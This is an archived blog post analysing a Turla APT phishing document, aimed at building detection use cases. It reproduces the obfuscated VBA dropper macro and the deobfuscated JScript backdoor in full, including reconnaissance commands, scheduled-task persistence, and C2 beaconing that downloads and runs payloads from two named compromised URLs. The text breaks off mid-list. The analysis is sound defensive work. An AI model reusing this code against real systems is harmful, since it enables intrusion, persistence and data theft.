{ "id": "718cd1eb-4be4-4932-8b6d-9097f774a37f", "created_at": "2026-04-06T00:14:23.589994Z", "updated_at": "2026-04-10T03:33:35.887264Z", "deleted_at": null, "sha1_hash": "074b04779bd356b303c6cc77c1afc7853c582e59", "title": "Analysis of a malicious DOC used by Turla APT group; hunting persistence via PowerShell", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1205211, "plain_text": "Analysis of a malicious DOC used by Turla APT group; hunting\r\npersistence via PowerShell\r\nArchived: 2026-04-05 13:20:05 UTC\r\nYesterday,  John Lambert (@JohnLaTwC), from Microsoft Threat Intelligence Center twitted about some\r\nmalicious document used by Turla ATP group.  The malicious document was in VT since a few hours before his\r\ntweet \r\nIn a daily basis I have to deal with malicious documents delivered by phishing emails so I was interested in\r\nunderstand how this malicious document works, if a new exploit was used, or any new technique. This analysis\r\nallows me to create detection use cases.\r\nThe doc file mimics the agenda for an event sent from an embassy \r\n \r\nOnce the macro has been executed, I can see that the process WINWORD.EXE spawns a WScript.exe command.\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 1 of 20\n\nA use case which monitor any WScript.exe process which has been spawned  by Office would detect this\r\nbehaviour.  Same would apply for PowerShell or cmd.exe\r\nThis generic Use Case would detect lot of common malware which uses Office documents as infection vector.\r\nAfter some minutes, the script executes several other commands, like for example 'net use' , 'net share' , 'task list',\r\n'ipconfig'', 'netstat', etc, to map the system and the network.\r\nThis is also a valid use case to implement. Obviously, this will need some fine tuning depending on the\r\nenvironment, but as an start point can permit the detection of suspicious behaviour.\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 2 of 20\n\nAt a later stage the same script performs some internet connections. Here again, monitoring any script like\r\nwscript.exe, cmd.exe or powershell.exe making connections to Internet can provide a lot of\r\nmeaningful information. (This is already discussed here http://blog.angelalonso.es/2017/08/malspam-campaign-exploiting-cve-2017.html)\r\nSo this malicious file would be detected with a generic use cases which monitor properly some processes and\r\nconnections.\r\nNow, let's take a look to the code to see if I find something interesting.\r\nThe VBA macro is ofuscated\r\nPublic OBKHLrC3vEDjVL As String\r\nPublic B8qen2T433Ds1bW As String\r\nFunction Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolea\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 3 of 20\n\nDim THQNfU76nlSbtJ5nX8LY6 As Byte\r\nTHQNfU76nlSbtJ5nX8LY6 = 45\r\nFor i = 0 To M5wI32R3VF2g5B21EK4d - 1\r\nEjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6\r\nTHQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))\r\nNext i\r\nQ7JOhn5pIl648L6V43V = True\r\nEnd Function\r\nSub AutoClose()\r\nOn Error Resume Next\r\nKill OBKHLrC3vEDjVL\r\nOn Error Resume Next\r\nSet R7Ks7ug4hRR2weOy7 = CreateObject(\"Scripting.FileSystemObject\")\r\nR7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW \u0026 \"\\*.*\", True\r\nSet R7Ks7ug4hRR2weOy7 = Nothing\r\nEnd Sub\r\nSub AutoOpen()\r\nOn Error GoTo MnOWqnnpKXfRO\r\nDim NEnrKxf8l511\r\nDim N18Eoi6OG6T2rNoVl41W As Long\r\nDim M5wI32R3VF2g5B21EK4d As Long\r\nN18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)\r\nNEnrKxf8l511 = FreeFile\r\nOpen (ActiveDocument.FullName) For Binary As #NEnrKxf8l511\r\nDim E2kvpmR17SI() As Byte\r\nReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)\r\nGet #NEnrKxf8l511, 1, E2kvpmR17SI\r\nDim KqG31PcgwTc2oL47hjd7Oi As String\r\nKqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)\r\nDim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD\r\nDim VUy5oj112fLw51h6S\r\nSet VUy5oj112fLw51h6S = CreateObject(\"vbscript.regexp\")\r\nVUy5oj112fLw51h6S.Pattern = \"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1S\r\nSet I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)\r\nDim Y5t4Ul7o385qK4YDhr\r\nIf I4j833DS5SFd34L3gwYQD.Count = 0 Then\r\nGoTo MnOWqnnpKXfRO\r\nEnd If\r\nFor Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD\r\nY5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex\r\nExit For\r\nNext\r\nDim Wk4o3X7x1134j() As Byte\r\nDim KDXl18qY4rcT As Long\r\nKDXl18qY4rcT = 16827\r\nReDim Wk4o3X7x1134j(KDXl18qY4rcT)\r\nGet #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 4 of 20\n\nIf Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then\r\nGoTo MnOWqnnpKXfRO\r\nEnd If\r\nB8qen2T433Ds1bW = Environ(\"appdata\") \u0026 \"\\Microsoft\\Windows\"\r\nSet R7Ks7ug4hRR2weOy7 = CreateObject(\"Scripting.FileSystemObject\")\r\nIf Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then\r\nB8qen2T433Ds1bW = Environ(\"appdata\")\r\nEnd If\r\nSet R7Ks7ug4hRR2weOy7 = Nothing\r\nDim K764B5Ph46Vh\r\nK764B5Ph46Vh = FreeFile\r\nOBKHLrC3vEDjVL = B8qen2T433Ds1bW \u0026 \"\\\" \u0026 \"maintools.js\"\r\nOpen (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh\r\nPut #K764B5Ph46Vh, 1, Wk4o3X7x1134j\r\nClose #K764B5Ph46Vh\r\nErase Wk4o3X7x1134j\r\nSet R66BpJMgxXBo2h = CreateObject(\"WScript.Shell\")\r\nR66BpJMgxXBo2h.Run \"\"\"\" + OBKHLrC3vEDjVL + \"\"\"\" + \" EzZETcSXyKAdF_e5I2i1\"\r\nActiveDocument.Save\r\nExit Sub\r\nMnOWqnnpKXfRO:\r\nClose #K764B5Ph46Vh\r\nActiveDocument.Save\r\nEnd Sub\r\nThis code, basically creates a JS file C:\\Users\\user1\\AppData\\Roaming\\Microsoft\\Windows\\maintools.js and then\r\nexecutes it. However, for the execution to be success it is necessary to use the string  \" EzZETcSXyKAdF_e5I2i1\"\r\n  as parameter.\r\nMoving forward and looking at the JS file C:\\Users\\user1\\AppData\\Roaming\\Microsoft\\Windows\\maintools.js I\r\nsee it is obfuscated\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 5 of 20\n\ntry{var wvy1 = WScript.Arguments;var ssWZ = wvy1(0);var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(s\r\neval(ES3c);\r\n}catch (e)\r\n{WScript.Quit();}function MTvK(CgqD){var XwH7 = CgqD.charCodeAt(0);if (XwH7 === 0x2B || XwH7 === 0x2D\r\nif (XwH7 === 0x2F || XwH7 === 0x5F) return 63\r\nif (XwH7 \u003c 0x30) return -1\r\nif (XwH7 \u003c 0x30 + 10) return XwH7 - 0x30 + 26 + 26\r\nif (XwH7 \u003c 0x41 + 26) return XwH7 - 0x41\r\nif (XwH7 \u003c 0x61 + 26) return XwH7 - 0x61 + 26\r\n}function LXv5(d27x){var LUK7 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";va\r\nreturn;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) ==\r\nvar mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR \u003e 0 ? d27x.length - 4 : d27x.length\r\nXGH6((n6T8 \u0026 0xFF00) \u003e\u003e 8)\r\nXGH6(n6T8 \u0026 0xFF)\r\n}if (V8eR === 2){n6T8 = (MTvK(d27x.charAt(i)) \u003c\u003c 2) | (MTvK(d27x.charAt(i + 1)) \u003e\u003e 4)\r\nXGH6(n6T8 \u0026 0xFF)\r\n}else if (V8eR === 1){n6T8 = (MTvK(d27x.charAt(i)) \u003c\u003c 10) | (MTvK(d27x.charAt(i + 1)) \u003c\u003c 4) | (MTvK(d\r\nXGH6((n6T8 \u003e\u003e 8) \u0026 0xFF)\r\nXGH6(n6T8 \u0026 0xFF)\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 6 of 20\n\n}return mjqo\r\n}function CpPT(bOe3,F5vZ)\r\n{var AWy7 = [];var V2Vl = 0;var qyCq;var mjqo = '';for (var i = 0; i \u003c 256; i++)\r\n{AWy7[i] = i;}for (var i = 0; i \u003c 256; i++)\r\n{V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl\r\n{i = (i + 1) % 256;V2Vl = (V2Vl + AWy7[i]) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyC\r\n{var qGxZ = \"zAubgpaJRj0tIneNNZL0wjPqnSRiIygEC/sEWEDJU8LoihPXjdbeiMqcs6AavcLCPXuFM9LJ7svWGgIJKnOOKpe5\r\nAn easy way to view the code a bit cleaner, is to print the code before the eval(ES3c);     with a\r\nWScript.Echo(ES3c)\r\nOnce done, I run the command with the proper string as I got the code:\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 7 of 20\n\nfunction UspD(zDmy)\r\n{var m3mH = WScript.CreateObject(\"ADODB.Stream\")\r\nm3mH.Type = 2;\r\nm3mH.CharSet = '437';\r\nm3mH.Open();\r\nm3mH.LoadFromFile(zDmy);\r\nvar c0xi = m3mH.ReadText;\r\nm3mH.Close();\r\nreturn cz_b(c0xi);\r\n}\r\nvar CKpR = new Array (\"http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\",\"http://www\r\nvar tpO8 = \"w3LxnRSbJcqf8HrU\";\r\nvar auME = new Array(\"systeminfo \u003e \",\"net view \u003e\u003e \",\"net view /domain \u003e\u003e \",\"tasklist /v \u003e\u003e \",\"gpresul\r\nvar QUjy = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar LIxF = WScript.ScriptName;\r\nvar w5mY = \"\";\r\nvar ruGx = TfOh();\r\nfunction hLit(XngP,y1qa)\r\n{char_set = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\r\nvar Rj3c = \"\";\r\nvar OKpB = \"\";\r\nfor (var i = 0;\r\n i \u003c XngP.length;\r\n ++i)\r\n{var B8wU = XngP.charCodeAt(i);\r\nvar LUxg = B8wU.toString(2);\r\nwhile (LUxg.length \u003c (y1qa ? 8 : 16))\r\nLUxg = \"0\" + LUxg;\r\nOKpB += LUxg;\r\nwhile (OKpB.length \u003e= 6)\r\n{var vjUu = OKpB.slice(0,6);\r\nOKpB = OKpB.slice(6);\r\nRj3c += this.char_set.charAt(parseInt(vjUu,2));\r\n}}if (OKpB)\r\n{while (OKpB.length \u003c 6) OKpB += \"0\";\r\nRj3c += this.char_set.charAt(parseInt(OKpB,2));\r\n}while (Rj3c.length % (y1qa ? 4 : 8) != 0)\r\nRj3c += \"=\";\r\nreturn Rj3c;\r\n}\r\nvar b92A = [];\r\nb92A['C7'] = '80';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 8 of 20\n\nb92A['FC'] = '81';\r\nb92A['E9'] = '82';\r\nb92A['E2'] = '83';\r\nb92A['E4'] = '84';\r\nb92A['E0'] = '85';\r\nb92A['E5'] = '86';\r\nb92A['E7'] = '87';\r\nb92A['EA'] = '88';\r\nb92A['EB'] = '89';\r\nb92A['E8'] = '8A';\r\nb92A['EF'] = '8B';\r\nb92A['EE'] = '8C';\r\nb92A['EC'] = '8D';\r\nb92A['C4'] = '8E';\r\nb92A['C5'] = '8F';\r\nb92A['C9'] = '90';\r\nb92A['E6'] = '91';\r\nb92A['C6'] = '92';\r\nb92A['F4'] = '93';\r\nb92A['F6'] = '94';\r\nb92A['F2'] = '95';\r\nb92A['FB'] = '96';\r\nb92A['F9'] = '97';\r\nb92A['FF'] = '98';\r\nb92A['D6'] = '99';\r\nb92A['DC'] = '9A';\r\nb92A['A2'] = '9B';\r\nb92A['A3'] = '9C';\r\nb92A['A5'] = '9D';\r\nb92A['20A7'] = '9E';\r\nb92A['192'] = '9F';\r\nb92A['E1'] = 'A0';\r\nb92A['ED'] = 'A1';\r\nb92A['F3'] = 'A2';\r\nb92A['FA'] = 'A3';\r\nb92A['F1'] = 'A4';\r\nb92A['D1'] = 'A5';\r\nb92A['AA'] = 'A6';\r\nb92A['BA'] = 'A7';\r\nb92A['BF'] = 'A8';\r\nb92A['2310'] = 'A9';\r\nb92A['AC'] = 'AA';\r\nb92A['BD'] = 'AB';\r\nb92A['BC'] = 'AC';\r\nb92A['A1'] = 'AD';\r\nb92A['AB'] = 'AE';\r\nb92A['BB'] = 'AF';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 9 of 20\n\nb92A['2591'] = 'B0';\r\nb92A['2592'] = 'B1';\r\nb92A['2593'] = 'B2';\r\nb92A['2502'] = 'B3';\r\nb92A['2524'] = 'B4';\r\nb92A['2561'] = 'B5';\r\nb92A['2562'] = 'B6';\r\nb92A['2556'] = 'B7';\r\nb92A['2555'] = 'B8';\r\nb92A['2563'] = 'B9';\r\nb92A['2551'] = 'BA';\r\nb92A['2557'] = 'BB';\r\nb92A['255D'] = 'BC';\r\nb92A['255C'] = 'BD';\r\nb92A['255B'] = 'BE';\r\nb92A['2510'] = 'BF';\r\nb92A['2514'] = 'C0';\r\nb92A['2534'] = 'C1';\r\nb92A['252C'] = 'C2';\r\nb92A['251C'] = 'C3';\r\nb92A['2500'] = 'C4';\r\nb92A['253C'] = 'C5';\r\nb92A['255E'] = 'C6';\r\nb92A['255F'] = 'C7';\r\nb92A['255A'] = 'C8';\r\nb92A['2554'] = 'C9';\r\nb92A['2569'] = 'CA';\r\nb92A['2566'] = 'CB';\r\nb92A['2560'] = 'CC';\r\nb92A['2550'] = 'CD';\r\nb92A['256C'] = 'CE';\r\nb92A['2567'] = 'CF';\r\nb92A['2568'] = 'D0';\r\nb92A['2564'] = 'D1';\r\nb92A['2565'] = 'D2';\r\nb92A['2559'] = 'D3';\r\nb92A['2558'] = 'D4';\r\nb92A['2552'] = 'D5';\r\nb92A['2553'] = 'D6';\r\nb92A['256B'] = 'D7';\r\nb92A['256A'] = 'D8';\r\nb92A['2518'] = 'D9';\r\nb92A['250C'] = 'DA';\r\nb92A['2588'] = 'DB';\r\nb92A['2584'] = 'DC';\r\nb92A['258C'] = 'DD';\r\nb92A['2590'] = 'DE';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 10 of 20\n\nb92A['2580'] = 'DF';\r\nb92A['3B1'] = 'E0';\r\nb92A['DF'] = 'E1';\r\nb92A['393'] = 'E2';\r\nb92A['3C0'] = 'E3';\r\nb92A['3A3'] = 'E4';\r\nb92A['3C3'] = 'E5';\r\nb92A['B5'] = 'E6';\r\nb92A['3C4'] = 'E7';\r\nb92A['3A6'] = 'E8';\r\nb92A['398'] = 'E9';\r\nb92A['3A9'] = 'EA';\r\nb92A['3B4'] = 'EB';\r\nb92A['221E'] = 'EC';\r\nb92A['3C6'] = 'ED';\r\nb92A['3B5'] = 'EE';\r\nb92A['2229'] = 'EF';\r\nb92A['2261'] = 'F0';\r\nb92A['B1'] = 'F1';\r\nb92A['2265'] = 'F2';\r\nb92A['2264'] = 'F3';\r\nb92A['2320'] = 'F4';\r\nb92A['2321'] = 'F5';\r\nb92A['F7'] = 'F6';\r\nb92A['2248'] = 'F7';\r\nb92A['B0'] = 'F8';\r\nb92A['2219'] = 'F9';\r\nb92A['B7'] = 'FA';\r\nb92A['221A'] = 'FB';\r\nb92A['207F'] = 'FC';\r\nb92A['B2'] = 'FD';\r\nb92A['25A0'] = 'FE';\r\nb92A['A0'] = 'FF';\r\nfunction TfOh()\r\n{var ayuh = Math.ceil(Math.random()*10 + 25);\r\nvar name = String.fromCharCode(Math.ceil(Math.random()*24 + 65));\r\nvar dc9V = WScript.CreateObject(\"WScript.Network\");\r\nw5mY = dc9V.UserName;\r\nfor (var count = 0;\r\n count \u003cayuh ;\r\ncount++ )\r\n{switch (Math.ceil(Math.random()*3))\r\n {case 1:\r\nname = name + Math.ceil(Math.random()*8);\r\n break;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 11 of 20\n\ncase 2:\r\n name = name + String.fromCharCode(Math.ceil(Math.random()*24 + 97));\r\n break;\r\n default:\r\n name = name + String.fromCharCode(Math.ceil(Math.random()*24 + 65));\r\n break;\r\n }}return name;\r\n}\r\nvar wyKN = Blgx(bIdG());\r\ntry\r\n{var WE86 = bIdG();\r\nrGcR();\r\njSm8();\r\n}catch(e)\r\n{WScript.Quit();\r\n}\r\nfunction jSm8()\r\n{var c9lr = Fv6b();\r\nwhile(true)\r\n{for (var i = 0;\r\n i \u003c CKpR.length;\r\n i++)\r\n{var Ysyo = CKpR[i];\r\nvar f3cb = XEWG(Ysyo,c9lr);\r\n \r\nswitch (f3cb)\r\n{case \"good\":\r\n break;\r\n case \"exit\": WScript.Quit();\r\n break;\r\n case \"work\": XBL3(Ysyo);\r\n break;\r\n case \"fail\": tbMu();\r\n \r\n break;\r\n default:\r\n break;\r\n}TfOh();\r\n}WScript.Sleep((Math.random()*300 + 3600) * 1000);\r\n}}function bIdG()\r\n{var spq3= this['\\u0041\\u0063\\u0074i\\u0076eX\\u004F\\u0062j\\u0065c\\u0074'];\r\nvar zBVv = new spq3('\\u0057\\u0053cr\\u0069\\u0070\\u0074\\u002E\\u0053he\\u006C\\u006C');\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 12 of 20\n\nreturn zBVv;\r\n}function XBL3(B_TG)\r\n{var YIme = wyKN + LIxF.substring(0,LIxF.length - 2) + \"pif\";\r\nvar Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",B_TG,false);\r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\n x64);\r\n \" + Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nKpxo.SETREQUESTHEADER(\"content-length:\",\"4\");\r\nKpxo.SEND(\"work\");\r\nif (QUjy.FILEEXISTS(YIme))\r\n{QUjy.DELETEFILE(YIme);\r\n}if (Kpxo.STATUS == 200)\r\n{var m3mH = new ActiveXObject(\"ADODB.STREAM\");\r\nm3mH.TYPE = 1;\r\nm3mH.OPEN();\r\nm3mH.WRITE(Kpxo.responseBody);\r\nm3mH.Position = 0;\r\nm3mH.Type = 2;\r\nm3mH.CharSet = \"437\";\r\nvar c0xi = m3mH.ReadText(m3mH.Size);\r\nvar ptF0 = FXx9(\"2f532d6baec3d0ec7b1f98aed4774843\",cz_b(c0xi));\r\nNoRS(ptF0,YIme);\r\n m3mH.Close();\r\n}var ruGx = TfOh();\r\nc5ae(YIme,B_TG);\r\nWScript.Sleep(30000);\r\nQUjy.DELETEFILE(YIme);\r\n}function tbMu()\r\n{QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);\r\neV_C(\"TaskManager\",\"Windows Task Manager\",w5mY,v_FileName,\"EzZETcSXyKAdF_e5I2i1\",wyKN,false);\r\nKhDn(\"TaskManager\");\r\nWScript.Quit();\r\n}function XEWG(uXHK,hm2j)\r\n{try\r\n{var Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",uXHK,false);\r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\n x64);\r\n \" + Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nvar rRi3 = hLit(hm2j,true);\r\nKpxo.SETREQUESTHEADER(\"content-length:\",rRi3.length);\r\nKpxo.SEND(rRi3);\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 13 of 20\n\nreturn Kpxo.responseText;\r\n}catch(e)\r\n{return \"\";\r\n}}function Sz8k()\r\n{var n9mV =\"\";\r\nvar dc9V = WScript.CreateObject(\"WScript.Network\");\r\nvar rRi3 = tpO8 + dc9V.ComputerName + w5mY;\r\nfor (var i = 0;\r\n i \u003c 16;\r\n i++)\r\n{var YsXA = 0\r\nfor (var j = i;\r\n j \u003c rRi3.length - 1;\r\n j++)\r\n{YsXA = YsXA ^ rRi3.charCodeAt(j);\r\n}YsXA =(YsXA % 10);\r\nn9mV = n9mV + YsXA.toString(10);\r\n}n9mV = n9mV + tpO8;\r\nreturn n9mV;\r\n}function rGcR()\r\n{v_FileName = wyKN + LIxF.substring(0,LIxF.length - 2) + \"js\";\r\nQUjy.COPYFILE(WScript.ScriptFullName,wyKN + LIxF);\r\nvar HFp7 = (Math.random()*150 + 350) * 1000;\r\nWScript.Sleep(HFp7);\r\neV_C(\"TaskManager\",\"Windows Task Manager\",w5mY,v_FileName,\"EzZETcSXyKAdF_e5I2i1\",wyKN,true);\r\n}function Fv6b()\r\n{var m_Rr = wyKN + \"~dat.tmp\";\r\nfor (var i = 0;\r\n i \u003c auME.length;\r\n i++)\r\n{WE86.Run(\"cmd.exe /c \" + auME[i] + \"\\x22\" + m_Rr + \"\\x22\",0,true);\r\n \r\n}var nRVN = UspD(m_Rr);\r\nWScript.Sleep(1000);\r\nQUjy.DELETEFILE(m_Rr);\r\nreturn FXx9(\"2f532d6baec3d0ec7b1f98aed4774843\",nRVN);\r\n}function c5ae(YIme,B_TG)\r\n{try\r\n{if (QUjy.FILEEXISTS(YIme))\r\n{WE86.Run(\"\\x22\" + YIme + \"\\x22\" );\r\n}}catch(e)\r\n{var Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",B_TG,false);\r\nvar ePMy = \"error\";\r\n \r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 14 of 20\n\nx64);\r\n \" + Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nKpxo.SETREQUESTHEADER(\"content-length:\",ePMy.length);\r\nKpxo.SEND(ePMy);\r\nreturn \"\";\r\n}}function RPbY(r_X5)\r\n{var w8rG=\"0123456789ABCDEF\";\r\nvar yjrw = w8rG.substr(r_X5 \u0026 15,1);\r\nwhile(r_X5\u003e15)\r\n{r_X5 \u003e\u003e\u003e= 4;\r\nyjrw = w8rG.substr(r_X5 \u0026 15,1) + yjrw;\r\n}return yjrw;\r\n}function NptO(jlEi)\r\n{return parseInt(jlEi,16);\r\n}function eV_C(Bjmr,RT6x,O7Ec,YBwP,T9Px,egNr,rmGH)\r\n{try\r\n{var BGfI = WScript.CreateObject(\"Schedule.Service\");\r\nBGfI.Connect();\r\nvar w2cQ = BGfI.GetFolder(\"WPD\");\r\nvar xSm3 = BGfI.NewTask(0);\r\nxSm3.Principal.UserId = O7Ec;\r\nxSm3.Principal.LogonType = 6;\r\nvar wK2F = xSm3.RegistrationInfo;\r\nwK2F.Description = RT6x;\r\nwK2F.Author = O7Ec;\r\nvar aYbx = xSm3.Settings;\r\naYbx.Enabled = true;\r\naYbx.StartWhenAvailable = true;\r\naYbx.Hidden = rmGH;\r\nvar oSP7 = \"2015-07-12T11:47:24\";\r\nvar svaG = \"2020-03-21T08:00:00\";\r\nvar LDoN = xSm3.Triggers;\r\nvar r9EC = LDoN.Create(9);\r\nr9EC.StartBoundary = oSP7;\r\nr9EC.EndBoundary = svaG;\r\nr9EC.Id = \"LogonTriggerId\";\r\nr9EC.UserId = O7Ec;\r\nr9EC.Enabled = true;\r\nvar gQu9 = xSm3.Actions.Create(0);\r\ngQu9.Path = YBwP;\r\ngQu9.Arguments = T9Px;\r\ngQu9.WorkingDirectory = egNr;\r\nw2cQ.RegisterTaskDefinition(Bjmr,xSm3,6,\"\",\"\",3);\r\nreturn true;\r\n}catch(Err)\r\n{return false;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 15 of 20\n\n}}function KhDn(Bjmr)\r\n{try\r\n{var UGgw = false;\r\nvar BGfI = WScript.CreateObject(\"Schedule.Service\");\r\nBGfI.Connect()\r\nvar w2cQ = BGfI.GetFolder(\"WPD\");\r\nvar FLs6 = w2cQ.GetTasks(0);\r\nif (FLs6.count \u003e= 0)\r\n{var gk1H = new Enumerator(FLs6);\r\nfor (;\r\n !gk1H.atEnd();\r\n gk1H.moveNext())\r\n{if (gk1H.item().name == Bjmr)\r\n{w2cQ.DeleteTask(Bjmr,0);\r\nUGgw = true;\r\n}}}}catch(Err)\r\n{return false;\r\n}}function cz_b(S3Ws)\r\n{var n9mV = [];\r\nvar mvAu = S3Ws.length;\r\nfor (var i = 0;\r\n i \u003c mvAu;\r\n i++)\r\n{var wtVX = S3Ws.charCodeAt(i);\r\nif(wtVX \u003e= 128)\r\n{var h = b92A['' + RPbY(wtVX)];\r\nwtVX = NptO(h);\r\n}n9mV.push(wtVX);\r\n}return n9mV;\r\n}function NoRS(ExY2,igeK)\r\n{var m3mH = WScript.CreateObject(\"ADODB.Stream\");\r\nm3mH.type = 2;\r\nm3mH.Charset = \"iso-8859-1\";\r\nm3mH.Open();\r\nm3mH.WriteText(ExY2);\r\nm3mH.Flush();\r\nm3mH.Position = 0;\r\nm3mH.SaveToFile(igeK,2);\r\nm3mH.close();\r\n}function Blgx(gaWo)\r\n{wyKN = \"c:\\x5cUsers\\x5c\" + w5mY + \"\\x5cAppData\\x5cLocal\\x5cMicrosoft\\x5cWindows\\x5c\";\r\nif (! QUjy.FOLDEREXISTS(wyKN))\r\nwyKN = \"c:\\x5cUsers\\x5c\" + w5mY + \"\\x5cAppData\\x5cLocal\\x5cTemp\\x5c\";\r\nif (! QUjy.FOLDEREXISTS(wyKN))\r\nwyKN = \"c:\\x5cDocuments and Settings\\x5c\" + w5mY + \"\\x5cApplication Data\\x5cMicrosoft\\x5cWindows\\x5c\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 16 of 20\n\nreturn wyKN\r\n}function FXx9(Z_3F,VMd7)\r\n{var NNSX = [];\r\nvar JDro = 0;\r\nvar KagY;\r\nvar n9mV = '';\r\nfor (var i = 0;\r\n i \u003c 256;\r\n i++)\r\n{NNSX[i] = i;\r\n}for (var i = 0;\r\n i \u003c 256;\r\n i++)\r\n{JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;\r\nKagY = NNSX[i];\r\nNNSX[i] = NNSX[JDro];\r\nNNSX[JDro] = KagY;\r\n}var i = 0;\r\nvar JDro = 0;\r\nfor (var y = 0;\r\n y \u003c VMd7.length;\r\n y++)\r\n{i = (i + 1) % 256;\r\nJDro = (JDro + NNSX[i]) % 256;\r\nKagY = NNSX[i];\r\nNNSX[i] = NNSX[JDro];\r\nNNSX[JDro] = KagY;\r\nn9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);\r\n}return n9mV;\r\n}\r\nIn the 'clean' code it is possible to see the URL for the second stage payload, which at the time of this analysis did\r\nnot work anymore\r\n\"http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\",\r\n\"http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\r\nAdditionally, the list of commands to map the system are in the code:\r\nsysteminfo \u003e \",\"net view \u003e\u003e \",\"net view /domain \u003e\u003e \",\"tasklist /v \u003e\u003e \",\"gpresult /z \u003e\u003e \",\"netstat -nao \u003e\u003e\r\n\",\"ipconfig /all \u003e\u003e \",\"arp -a \u003e\u003e \",\"net share \u003e\u003e \",\"net use \u003e\u003e \",\"net user \u003e\u003e \",\"net user administrator \u003e\u003e \",\"net user\r\n/domain \u003e\u003e \",\"net user administrator /domain \u003e\u003e \",\"set  \u003e\u003e \",\"dir %systemdrive%\\x5cUsers\\x5c*.* \u003e\u003e \",\"dir\r\n%userprofile%\\x5cAppData\\x5cRoaming\\x5cMicrosoft\\x5cWindows\\x5cRecent\\x5c*.* \u003e\u003e \",\"dir\r\n%userprofile%\\x5cDesktop\\x5c*.* \u003e\u003e \",\"tasklist /fi \\x22modules eq wow64.dll\\x22  \u003e\u003e \",\"tasklist /fi \\x22modules\r\nne wow64.dll\\x22 